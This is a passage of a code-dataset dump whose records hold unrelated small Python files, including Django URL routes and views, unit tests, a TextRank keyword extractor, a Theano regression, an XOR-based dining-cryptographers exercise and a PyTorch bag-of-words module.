complement()\n \"\"\"\n\n # Test complemented variables\n bs = BoolSheet('~(A + ~B) ~CA')\n result = bs.complement(bs.nest_parentheses(bs.to_lst())[1])\n self.assertEqual(\n result, [['~', ['A', '+', ['~', 'B']]], ['~', 'C'], 'A'])\n\n def test_to_graph(self):\n \"\"\" Test the method to_graph()\n \"\"\"\n\n # Correct nested expressions\n result = BoolSheet('~(A + B (AB + ~C)(CD)) D').to_graph()\n self.assertEqual(\n result, [['~', ['A', '+', 'B', ['A', 'B', '+', ['~', 'C']],\n ['C', 'D']]], 'D'])\n\n def test_pick_vars(self):\n \"\"\" Test the method pick_vars()\n \"\"\"\n\n # Pick boolean variables\n result = BoolSheet('~(A + B)CA').pick_vars()\n self.assertEqual(result, ['A', 'B', 'C'])\n\n def test_get_inner(self):\n \"\"\" Test the method get_inner()\n \"\"\"\n\n # Get the first innermost\n result = BoolSheet('~(A + B (AB + ~C)(CD)) D').get_inner()\n self.assertEqual(result, ['C', 'D'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"447649626","text":"# django module that creates the urls\nfrom django.urls import path\n# import all of your classes from views.py\nfrom .views import *\n\nurlpatterns = [\n\n #path (url/path,ViewClass.as_view(),name=\"nameofthisurl\")\n\tpath('',PaginaInicialView.as_view(), name=\"index\"),\n path('sobre/', SobreView.as_view(), name=\"sobre\"),\n\tpath('curriculo/', CurriculoView.as_view(), name=\"curriculo\"),\n 
\tpath('relatorio/atual/', VendaRelatirioList.as_view(), name=\"relatorio\"),\n\n\tpath('formulario/', FormularioView.as_view(), name=\"formulario\"),\n\tpath('lista/estados/', EstadoList.as_view(), name=\"listar-estados\"),\n\tpath('lista/cidades/', CidadeList.as_view(), name=\"listar-cidades\"),\n\tpath('lista/paises/', PaisList.as_view(), name=\"listar-paises\"),\n\tpath('lista/clientes/', ClienteList.as_view(), name=\"listar-clientes\"),\n\tpath('lista/funcionarios/', FuncionarioList.as_view(), name=\"listar-funcionarios\"),\n\tpath('lista/fornecedores/', FornecedorList.as_view(), name=\"listar-fornecedores\"),\n\tpath('lista/produtos/', ProdutoList.as_view(), name=\"listar-produtos\"),\n\tpath('lista/vendas/', VendaList.as_view(), name=\"listar-vendas\"),\n\n \tpath('venda/', VendaDetalhes.as_view(),name=\"detalhes_vendas\"),\n\t# path('funcionario/', FuncionarioView.as_view(), name=\"funcionario\"),\n\t# path('cliente/', ClienteView.as_view(), name=\"cliente\"),\n\n\t# path('historico/', HistoricoView.as_view(), name=\"historico\"),\n\n\t\n #CRUD URLS for states \n path('cadastrar/estado/',EstadoCreate.as_view(), name=\"cadastrar-estado\"),\n\tpath('editar/estado//',EstadoUpdate.as_view(), name=\"editar-estado\"),\n path('excluir/estado//',EstadoDelete.as_view(), name=\"excluir-estado\"),\n\n\t #CRUD URLS for countries\n\n\tpath('cadastrar/pais/',PaisCreate.as_view(), name=\"cadastrar-pais\"),\n\tpath('editar/pais/',PaisUpdate.as_view(), name=\"editar-pais\"),\n\tpath('excluir/pais//',PaisDelete.as_view(), name=\"excluir-pais\"),\n\t\n\t #CRUD URLS for cities\n\n\tpath('cadastrar/cidade/',CidadeCreate.as_view(), name=\"cadastrar-cidade\"),\n\tpath('excluir/cidade/',CidadeDelete.as_view(), name=\"excluir-cidade\"),\n\tpath('editar/cidade/',CidadeUpdate.as_view(), name=\"editar-cidade\"),\n\n\t#CRUD URLS for clients\n\n\tpath('cadastrar/cliente/',ClienteCreate.as_view(), name=\"cadastrar-cliente\"),\n\tpath('editar/cliente/',ClienteUpdate.as_view(), name=\"editar-cliente\"),\n path('excluir/cliente/',ClienteDelete.as_view(), name=\"excluir-cliente\"),\n\t#CRUD URLS for employees\n\n path('cadastrar/funcionario/',FuncionarioCreate.as_view(), name=\"cadastrar-funcionario\"),\n\tpath('editar/funcionario/',FuncionarioUpdate.as_view(), name=\"editar-funcionario\"),\n path('excluir/funcionario/',FuncionarioDelete.as_view(), name=\"excluir-funcionario\"),\n\n\t#CRUD URLS for suppliers\n\n\tpath('cadastrar/fornecedor/',FornecedorCreate.as_view(), name=\"cadastrar-fornecedor\"),\n\tpath('editar/fornecedor/',FornecedorUpdate.as_view(), name=\"editar-fornecedor\"),\n\tpath('excluir/fornecedor/',FornecedorDelete.as_view(), name=\"excluir-fornecedor\"),\n\n\t#CRUD URLS for products\n\tpath('cadastrar/produto/',ProdutoCreate.as_view(), name=\"cadastrar-produto\"),\n\tpath('editar/produto/',ProdutoUpdate.as_view(), name=\"editar-produto\"),\n\tpath('excluir/produto/',ProdutoDelete.as_view(), name=\"excluir-produto\"),\n\n\t#CRUD URLS for sales\n\tpath('cadastrar/venda/',VendaCreate.as_view(), name=\"cadastrar-venda\"),\n\n\t#CRUD URLS for product stock entries\n\n\tpath('cadastrar/entradaProduto/', EntradaProdutoCreate.as_view(),\n\t name=\"cadastrar-entrada-produto\"),\n\n\n\n\n]\n","sub_path":"adocao/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"546646129","text":"def saveusers(clients, filename):\n text = \"\"\n for 
user in clients:\n text += user + \",\" + str(clients[user]) + \"\\n\" # this gets written out as text, but the socket connection has to be converted to str here; one user per line so loadusers can read it back with readlines\n #print(type(clients[user]), \" here\")\n f = open(filename,'w')\n f.write(text)\n f.close()\n\ndef loadusers(filename):\n db = {}\n f = open(filename)\n users = f.readlines()\n f.close()\n\n# an error happens here because the user's connection is not of type socket, but of type string\n for user in users:\n db[user.split(\",\")[0]] = user.split(\",\")[1][:-1] # correct = wrong, where 'wrong' is the connection in string format\n print(user.split(\",\")[1][:-1])\n return db\n\ndef savehistory(history, filename):\n text = \"\"\n for line in history:\n text += line + \"\\n\"\n\n f = open(filename, 'w')\n f.write(text)\n f.close()\n\ndef loadhistory(filename):\n list = []\n\n f = open(filename, 'r')\n history = f.readlines()\n for line in history:\n list.append(line)\n return list\n\ndef load(filnavn):\n f = open(filnavn,'r')\n\n info = f.readlines()\n list = []\n\n for line in info:\n list.append(line)\n f.close()\n\n return list\n\n","sub_path":"Server/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"536125741","text":"#!/usr/bin/python\n\n#coding=gbk\n\n# Echo server program\nimport socket\n\nHOST = '' # Symbolic name meaning all available interfaces\nPORT = 8080 # Arbitrary non-privileged port\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen(1)\n conn, addr = s.accept()\n with conn:\n print('Connected by', addr)\n while True:\n data = conn.recv(1024)\n if not data: break\n #conn.sendall(data)\n #print(len(data), data, '\\n')\n print('len=', len(data), '\\n')\n if len(data) == 22:\n conn.send(b'GATOR 20\\n')\n if len(data) == 411:\n conn.send(b'\\x04\\x00\\x00\\x00\\x00\\x00')\n if len(data) == 66:\n conn.send(b'\\x01\\xcd\\x03\\x00\\x00\\x00')\n conn.send(data_973)\n \n","sub_path":"socket/python-tcpsvr.py","file_name":"python-tcpsvr.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"521110909","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 26 12:04:01 2018\n\n@author: Sotheanith Sok\n\"\"\"\n\nimport matplotlib.pyplot as plt \n\n\nx=range(3)\n\nplt.bar(x,[10,2,5])\n\nplt.show()","sub_path":"Project3/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"375371886","text":"from django.views.generic import View\nfrom django.shortcuts import render\n\nfrom quizzes.models import Quiz\nfrom quizzes.utils.nvd3 import create_chart_data_set\n\n\nclass QuizResultView(View):\n\n def get(self, request, *args, **kwargs):\n\n hash_id = self.kwargs.get('slug')\n quiz = Quiz.objects.public().get(hash_id=hash_id)\n\n questions = quiz.question_set.public()\n\n chart_data_set = create_chart_data_set(quiz)\n\n return render(\n request,\n \"quiz/result.html\",\n context={\n \"site_name\": \"typeYou\",\n \"quiz\": quiz,\n \"questions\": questions,\n \"chart_data_set\": chart_data_set,\n },\n )\n","sub_path":"typeYou/quizzes/views/quiz/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"402864007","text":"import theano\nimport theano.tensor
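# The comma-separated format in file.py above breaks if a username ever
# contains a comma, and a socket object cannot survive a text round-trip
# anyway. A common alternative (not the original server's code) is to persist
# only serialisable fields with json:
import json

def save_users(clients, filename):
    # store a string form of each connection; sockets are not serialisable
    with open(filename, "w") as f:
        json.dump({user: str(conn) for user, conn in clients.items()}, f)

def load_users(filename):
    with open(filename) as f:
        return json.load(f)

save_users({"alice": "127.0.0.1:5000"}, "users.json")
print(load_users("users.json"))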
as T\nfrom sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nimport numpy as np\n\nx,y = make_regression(n_samples=1000, noise=1.0)\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.4)\n\nX = T.fmatrix(\"X\") #floating point matrix\nY = T.fvector(\"Y\")\n\nw_init = np.zeros(x.shape[1])\nb_init = 0.0\nw= theano.shared(w_init)\nb= theano.shared(b_init)\n\np_y = T.dot(X,w) + b\ncost = T.mean((Y-p_y)**2)\nw_grad = T.grad(cost,w)\nb_grad = T.grad(cost,b)\n\ntrain_op = theano.function(inputs = [X,Y],\n outputs = cost,\n updates=[(w,w-0.01*w_grad),\n (b,b-0.01*b_grad)],\n allow_input_downcast=True)\npredict_ = theano.function(inputs = [X],\n outputs = p_y,\n allow_input_downcast=True)\n\nepoch=1000\nfor i in range(epoch):\n train_op(x_train,y_train)\n\nprint(r2_score(y_train, predict_(x_train)))\nprint(r2_score(y_test, predict_(x_test)))\n","sub_path":"linear_regre_theano.py","file_name":"linear_regre_theano.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"496756740","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# (C) Andrew Vasilyev, 2010\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. \n\nimport sys\n\nfrom preprocessor import Preprocessor\n\ndef parse_args(args):\n i = 1\n source_filename, target_filename, include_filenames = \"\", \"\", []\n while i < len(args):\n if \"-s\" == args[i]:\n i = i + 1\n source_filename = args[i]\n elif \"-t\" == args[i]:\n i = i + 1\n target_filename = args[i]\n elif \"-i\" == args[i]:\n i = i + 1\n while i < len(args) and \"-\" != args[i][0]:\n include_filenames.append(args[i])\n i = i + 1\n i = i + 1\n return (source_filename, target_filename, include_filenames)\n\ndef main(args):\n print(\"Athene Preprocessor v. 
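# NumPy restatement of the update rule the theano train_op above applies each
# epoch: w <- w - 0.01 * dMSE/dw and b <- b - 0.01 * dMSE/db. The toy
# one-feature data below stands in for make_regression output.
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(size=(100, 1))
y = 3.0 * x[:, 0] + 1.0

w, b = np.zeros(1), 0.0
for _ in range(500):
    err = x @ w + b - y                     # residuals of the current fit
    w -= 0.01 * 2.0 * (x.T @ err) / len(y)  # gradient of mean squared error
    b -= 0.01 * 2.0 * err.mean()
print(w, b)  # approaches [3.0] and 1.0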
0.1\")\n if (len(args) > 2): \n source_filename, target_filename, include_filenames = parse_args(args)\n if (\"\" == source_filename or \"\" == target_filename):\n print(\"arguments error\")\n preprocessor = Preprocessor(source_filename, target_filename, include_filenames)\n preprocessor.run()\n print(\"ok!\")\n else:\n print(\"Usage:\")\n print(\"\\tathp -s source -t target [-i file file file]\") \n \nif __name__ == '__main__':\n main(sys.argv)","sub_path":"trash/athene/src/athp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101323881","text":"import nltk\nimport re\n\nnltk.download('punkt')\nnltk.download('maxent_treebank_pos_tagger')\nnltk.download('averaged_perceptron_tagger')\n\nfrom nltk import word_tokenize, pos_tag\n\nclass Recommender:\n\t\"\"\"docstring for Recommender\"\"\"\n\tdef __init__(self, bio):\n\t\tself.bio = bio\n\n\tdef tag_words(self):\n\t\ttokenized_text = word_tokenize(self.bio)\n\t\ttagged_words = pos_tag(tokenized_text)\n\t\ttagged_words_filtered = []\n\t\t# Filter out words that aren't nouns, verbs and adverbs\n\t\tpattern1 = re.compile(\"V.*\")\n\t\tpattern2 = re.compile(\"N.*\")\n\t\tpattern3 = re.compile(\"R.*\")\n\t\tfor (word, tag) in tagged_words:\n\t\t\tif pattern1.match(tag) or pattern2.match(tag) or pattern3.match(tag):\n\t\t\t\ttagged_words_filtered.append(word.lower())\n\n\t\treturn tagged_words_filtered\n","sub_path":"app/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"29069863","text":"def hex_to_binary_string(hex):\n return bin(int(hex, 16))[2:].zfill(16)\n\ndef binary_string_to_hex(binary):\n return hex(int(binary, 2))[2:].zfill(4).upper()\n\ndef did_not_pay_for_meal(conf):\n return conf[\"SA\"]^conf[\"SB\"]\n\ndef did_pay_for_meal(conf):\n return 1 - did_not_pay_for_meal(conf)\n\ndef calculate_output(conf):\n SA = hex_to_binary_string(conf[\"SA\"])\n SB = hex_to_binary_string(conf[\"SB\"])\n DA = hex_to_binary_string(conf[\"DA\"])\n DB = hex_to_binary_string(conf[\"DB\"])\n M = hex_to_binary_string(conf[\"M\"])\n\n our_broadcast_binary = \"\"\n\n should_send_message = conf[\"b\"]\n\n for i in range(16):\n conf_i = {\n \"SA\": int(SA[i]),\n \"SB\": int(SB[i]),\n \"DA\": int(DA[i]),\n \"DB\": int(DB[i]),\n \"M\": int(M[i])\n }\n\n # Construct out broadcasted message\n XOR = conf_i[\"SA\"]^conf_i[\"SB\"]\n if should_send_message:\n our_broadcast_i = XOR^conf_i[\"M\"]\n else:\n our_broadcast_i = XOR\n\n our_broadcast_binary += str(our_broadcast_i)\n \n our_broadcast = binary_string_to_hex(our_broadcast_binary)\n # print(\"Our broadcast: {}\".format(our_broadcast))\n\n if not should_send_message:\n secret_message_binary = \"\"\n for i in range(16):\n conf_i = {\n \"WE\": int(our_broadcast_binary[i]),\n \"DA\": int(DA[i]),\n \"DB\": int(DB[i]),\n }\n\n XOR = conf_i[\"WE\"]^conf_i[\"DA\"]^conf_i[\"DB\"]\n secret_message_binary += str(XOR)\n secret_message = binary_string_to_hex(secret_message_binary)\n # print(\"Secret message: {}\".format(secret_message))\n return our_broadcast + secret_message\n else:\n return our_broadcast\n\n\n\nconf_1 = {\n \"SA\": \"0C73\",\n \"SB\": \"80C1\",\n \"DA\": \"A2A9\",\n \"DB\": \"92F5\",\n \"M\": \"9B57\",\n \"b\": 0\n}\nconf_2 = {\n \"SA\": \"27C2\",\n \"SB\": \"0879\",\n \"DA\": \"35F6\",\n \"DB\": \"1A4D\",\n \"M\": \"27BC\",\n \"b\": 1\n}\nconf_quiz 
= {\n \"SA\": \"DA12\",\n \"SB\": \"5050\",\n \"DA\": \"C826\",\n \"DB\": \"4264\",\n \"M\": \"ADE4\",\n \"b\": 1\n}\na = calculate_output(conf_quiz)\nprint(a)\n","sub_path":"B2/dc_net.py","file_name":"dc_net.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209854240","text":"import string\n\nimport networkx as nx\n\nfrom nlp.text_parsing import parse_text\n\nWINDOW_SIZE = 3\n\nPOS_KEPT = [\"ADJ\",\n \"NOUN\",\n \"PROPN\",\n \"VERB\"]\n\n\ndef increment_edge(graph, node0, node1):\n \"\"\"Increment the weight of the edge <``node0``, ``node1``> in ``graph``.\n\n Args:\n graph (nx.Graph): graph.\n node0 (int): first node id.\n node1 (int): second node id.\n \"\"\"\n if graph.has_edge(node0, node1):\n graph[node0][node1][\"weight\"] += 1.0\n else:\n graph.add_edge(node0, node1, weight=1.0)\n\n\ndef link_sentence(doc, lemma_graph, seen_lemma):\n \"\"\"Link a sentence in the ``lemma_graph`` by adding the relevant vertices and edges.\n\n Args:\n doc (spacy.Doc): sent.\n lemma_graph (nx.Graph): lemma graph.\n seen_lemma (dict): a vocab-dict for lemma.\n \"\"\"\n visited_tokens = []\n visited_nodes = []\n\n for token in doc:\n if token.pos_ in POS_KEPT:\n key = (token.lemma_, token.pos_)\n if key not in seen_lemma:\n seen_lemma[key] = {token.lower}\n else:\n seen_lemma[key].add(token.lower)\n\n node_id = list(seen_lemma.keys()).index(key)\n if node_id not in lemma_graph:\n lemma_graph.add_node(node_id)\n\n for prev_token in range(len(visited_tokens) - 1, -1, -1):\n if (token.i - visited_tokens[prev_token]) <= WINDOW_SIZE:\n increment_edge(lemma_graph, node_id, visited_nodes[prev_token])\n else:\n break\n\n visited_tokens.append(token.i)\n visited_nodes.append(node_id)\n\n\ndef get_labels(seen_lemma, non_lemma=False):\n \"\"\"Get labels for seen lemmas.\n\n Args:\n seen_lemma (dict): map graph nodes to lemmas.\n non_lemma (bool): whether to include non lemmas.\n\n Returns:\n dict\n \"\"\"\n labels = {}\n for node_id, lbl in enumerate(seen_lemma.keys()):\n lemma_, _ = lbl\n lemma_ = lemma_.lower()\n if non_lemma is False and lemma_ in string.punctuation:\n continue\n labels[node_id] = lemma_\n return labels\n\n\ndef collect_phrases(ranks, labels, num_phrases=5):\n \"\"\"Collect phrases from a ranked lemma graph.\n\n Args:\n ranks (dict): map graph nodes to their ranking.\n lables (dict): map graph nodes to their corresponding lemma.\n num_phrases (int): num of phrases to return.\n\n Returns:\n list\n \"\"\"\n phrase_list = []\n phrase_num = 0\n for node_id, rank in sorted(ranks.items(), key=lambda x: x[1], reverse=True):\n lemma = labels.get(node_id)\n if not lemma:\n continue\n phrase_list.append((lemma, rank))\n phrase_num += 1\n if phrase_num == num_phrases:\n break\n return phrase_list\n\n\ndef calc_textrank(corpus, num_phrases=5):\n \"\"\"Build a lemma graph and calculate ``pagerank``.\n\n Args:\n corpus (list[str]): corpus of cleaned sentences.\n num_phrases (int): num of phrases to return.\n\n Returns:\n (lemma_graph, labels, ranks, phrase_list)\n s.t\n lemma_graph: nx.Graph\n labels: dict\n ranks: dict\n phrase_list: list[tuple]\n \"\"\"\n lemma_graph = nx.Graph()\n seen_lemma = {}\n\n for sent in corpus:\n doc = parse_text(sent)\n link_sentence(doc, lemma_graph, seen_lemma)\n\n ranks = nx.pagerank(lemma_graph)\n labels = get_labels(seen_lemma)\n phrase_list = collect_phrases(ranks, labels, num_phrases=num_phrases)\n return lemma_graph, labels, ranks, 
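# One-bit dining-cryptographers round mirroring the XOR logic in dc_net.py
# above (simplified to two parties and no decoy pads): with a shared coin S,
# A broadcasts S^m, B broadcasts S, and XOR-ing the two broadcasts recovers m.
import secrets

S = secrets.randbits(1)    # coin shared by A and B
m = 1                      # A's secret bit
broadcast_A = S ^ m
broadcast_B = S
assert broadcast_A ^ broadcast_B == m
print("recovered bit:", broadcast_A ^ broadcast_B)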
phrase_list\n","sub_path":"src/nlp/textrank.py","file_name":"textrank.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461574681","text":"import pytest\nfrom mock import Mock\n\n\ndef test_runcmd(monkeypatch):\n import ipsec.utils as utils\n sp = Mock()\n sp.Popen().returncode = 1\n sp.Popen().communicate.return_value = ('no', 'also no')\n monkeypatch.setattr(utils, 'sp', sp)\n with pytest.raises(utils.CommandError):\n utils.runcmd(['ls', '-l'])\n sp.Popen().returncode = 0\n assert utils.runcmd(['ls', '-l']) == None\n\ndef test_ipsecctl(monkeypatch):\n import ipsec.utils as utils\n runcmd = Mock()\n monkeypatch.setattr(utils, 'runcmd', runcmd)\n # refresh ipscctl\n utils.ipsecctl(\"/whee\")\n cmd = ['/sbin/ipsecctl', '-f', '/whee']\n runcmd.assert_called_with(cmd)\n # and a dry run\n utils.ipsecctl(\"/whee\", dryrun=True)\n cmd = ['/sbin/ipsecctl', '-f', '/whee', '-n']\n runcmd.assert_called_with(cmd)\n\ndef test_pfctl(monkeypatch):\n import ipsec.utils as utils\n import os.path\n exists = Mock()\n monkeypatch.setattr(os.path, 'exists', exists)\n runcmd = Mock()\n monkeypatch.setattr(utils, 'runcmd', runcmd)\n # run with no /etc/pf.conf\n exists.return_value = False\n utils.pfctl()\n assert runcmd.called == 0\n # real thing\n exists.return_value = True\n cmd = ['/sbin/pfctl', '-f', '/etc/pf.conf']\n utils.pfctl()\n runcmd.assert_called_with(cmd)\n # dry run\n cmd = ['/sbin/pfctl', '-f', '/etc/pf.conf', '-n']\n utils.pfctl(dryrun=True)\n runcmd.assert_called_with(cmd)\n","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"510965649","text":"import json\nimport time\nimport datetime\nfrom django.http import JsonResponse\nfrom apps.plan.db import create_plan, query_plan_by_id\nfrom apps.plan.tasks import handle_plan_acquisition_async\nfrom apps.plan.decorators import plan_acquisition_permission_check\nfrom apps.auth.decorators import login_required_ajax\nfrom apps.common.jwttools import verify_jwt\nfrom apps.order.db import create_order, gene_order_id\nfrom apps.order.codepay import CODEPAYWechatClient, CODEPAYAlipayClient\nfrom apps.common.code import *\nfrom apps.user.db import query_user_by_id\nfrom config.settings.default.db import MONGO_PAYMENT_COLLECTION\n\n\ndef create(request):\n name = request.POST['name']\n fee = int(request.POST['fee'])\n length = int(request.POST['length'])\n nodes = json.loads(request.POST['nodes'])\n content = request.POST['content']\n\n plan_id = create_plan(name, fee, length, content, nodes)\n return JsonResponse({\n 'code': 0,\n 'msg': '创建成功',\n 'data': {\n 'plan_id': plan_id\n }\n })\n\n\n# 之后需要做一下权限限制\n@plan_acquisition_permission_check\ndef acquire(request):\n user_id = request.POST['user_id']\n plan_id = request.POST['plan_id']\n handle_plan_acquisition_async.delay(user_id, plan_id)\n return JsonResponse({\n 'code': 0,\n 'msg': '后台正在加班运作中'\n })\n\n\n# @liaochangjiang 2018-06-07\n# 用户购买套餐的接口,返回一个付款界面\n@login_required_ajax\ndef buy(request):\n \"\"\"\n\n :param request: method,plan_id\n :return:\n \"\"\"\n method = int(request.POST['method'])\n if method == WECHAT_PAY_METHOD:\n client = CODEPAYWechatClient()\n elif method == ALIPAY_METHOD:\n client = CODEPAYAlipayClient()\n else:\n return JsonResponse({\n 'code': -1,\n 'msg': 'payment method not support!'\n })\n\n plan_id = 
int(request.POST['plan_id'])\n # 支付方式始终以codepay的接口为准:\n # 支付宝1,qq钱包2,微信支付3\n plyload, err = verify_jwt(request.COOKIES['jwt'])\n user_id = plyload['user_id']\n plan = query_plan_by_id(plan_id)\n amount = plan['fee']\n\n order_id = gene_order_id()\n MONGO_PAYMENT_COLLECTION.insert_one({\n 'type_code': REWARD_ORDER_TYPE,\n 'type_str': REWARD_ORDER_TYPE_STR,\n 'timestamp': int(time.time()),\n 'timestamp_str': str(datetime.datetime.now()).split(' ')[0],\n 'id': order_id,\n 'method': method,\n 'user_id': user_id,\n 'amount': amount,\n 'success': False,\n 'extra': {\n 'plan_id': plan_id\n }\n })\n\n codepay_url = client.gene_codepay_url(\n pay_id=order_id,\n price=amount,\n param={\n 'type_code': PLAN_ORDER_TYPE,\n 'type_str': PLAN_ORDER_TYPE_STR,\n 'order_id': order_id,\n }\n )\n return JsonResponse({\n 'code': 0,\n 'msg': '创建支付订单成功',\n 'data': {\n 'codepay_url': codepay_url\n }\n })\n","sub_path":"src/apps/plan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"12837857","text":"## DTSettingsConfig\n#\n# Copyright (c) 2016, Expressive Analytics, LLC .\n# All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# @package Deep Thought\n# @author Blake Anderson \n# @copyright 2016 Expressive Analytics, LLC \n# @licence http://choosealicense.com/licenses/mit\n# @link http://www.expressiveanalytics.com\n# @since version 1.0.0\n\nfrom .DTSettings import DTSettings\nimport json\nimport os\n\nclass DTSettingsConfig(DTSettings):\n    _shared_config = {}\n\n    @classmethod\n    def initShared(cls,path):\n        cls._shared_config = json.load(open(path))\n        return cls._shared_config\n\n    @classmethod\n    def sharedSettings(cls,settings=None):\n        if settings is not None:\n            cls._shared_config.update(settings)\n        return cls._shared_config\n\n    @classmethod\n    def baseURL(cls,suffix=\"\"):\n        base = \"\"\n        if \"base_url\" in cls._shared_config:\n            base = cls._shared_config[\"base_url\"]\n        elif \"HTTP_HOST\" in os.environ:\n            base = os.environ[\"HTTP_HOST\"]\n        if base[-1:] != \"/\":\n            base += \"/\"\n        if base == \"/\":\n            return \"/\"+suffix\n        # honour the CGI-style HTTPS flag when choosing the scheme\n        return \"{}://{}{}\".format(\"https\" if os.environ.get(\"HTTPS\", \"off\") != \"off\" else \"http\",base,suffix)\n","sub_path":"deepthought/utils/DTSettingsConfig.py","file_name":"DTSettingsConfig.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"600200854","text":"\"\"\"\nCBI agents are investigating a case in which they came across certain names of the culprits. They decided to encode the names into a number format.\n\n\"Riya\" is encoded as \"729611390\", \"Sumitha\" as \"73108101981109993\", \"Anandita\" as \"55101891039410011294\" and so on... Help them to encode the names.\n\nInput:\n\nFirst line of input contains an integer T denoting the number of test cases. T lines follow, each of which contains a string S denoting the name of a culprit.\nOutput:\n\nFor each test case, print the encoded integer on a new line.\nConstraints:\n\n1<=T<=100 and names contain only English alphabets\nExample:\n\nInput\n3\nSoni\nMona\nPawan\n\nOutput\n7310210298\n6710210290\n708811190104\n\"\"\"\n\n\ndef encoding_names(s):\n    # each character maps to ord(char) - 10 + its index within the name\n    ans = \"\"\n    for i in range(len(s)):\n        ans += str(ord(s[i]) - 10 + i)\n    return ans\n\n\nif __name__ == '__main__':\n    t = int(input())\n    for i in range(t):\n        s = input()\n        print(encoding_names(s))\n","sub_path":"practice/Basic/encoding_names.py","file_name":"encoding_names.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"548411372","text":"# coding=utf-8\nimport torch.nn as nn\n\nimport torch\n\n\nclass BOW(nn.Module):\n    \"\"\"BOW for a markdown header: calculates the average embedding of the\n    words in the header (the padding index, 2 by convention here, is zeroed\n    out by nn.Embedding's padding_idx).\n    \"\"\"\n\n    def __init__(self, markdown_vocab_size, emb_size, padding_idx):\n        super(BOW, self).__init__()\n        self.markdown_vocab_size = markdown_vocab_size\n        self.emb_size = emb_size\n        self.padding_idx = padding_idx\n        self.embedding = nn.Embedding(\n            markdown_vocab_size, emb_size, padding_idx=padding_idx)\n\n    def forward(self, markdown_label, markdown_len):\n        token_embedding = self.embedding(markdown_label)\n        sum_embedding = torch.sum(token_embedding, dim=1)\n        avg_embedding = torch.div(sum_embedding.T, markdown_len).T\n        return avg_embedding\n
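        # Shape sketch (assumed, not stated in the original): markdown_label
        # is (batch, seq_len) of padded token ids and markdown_len is (batch,)
        # holding the true lengths, so the double transpose above is just a
        # broadcasting trick equivalent to
        # sum_embedding / markdown_len.unsqueeze(-1).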
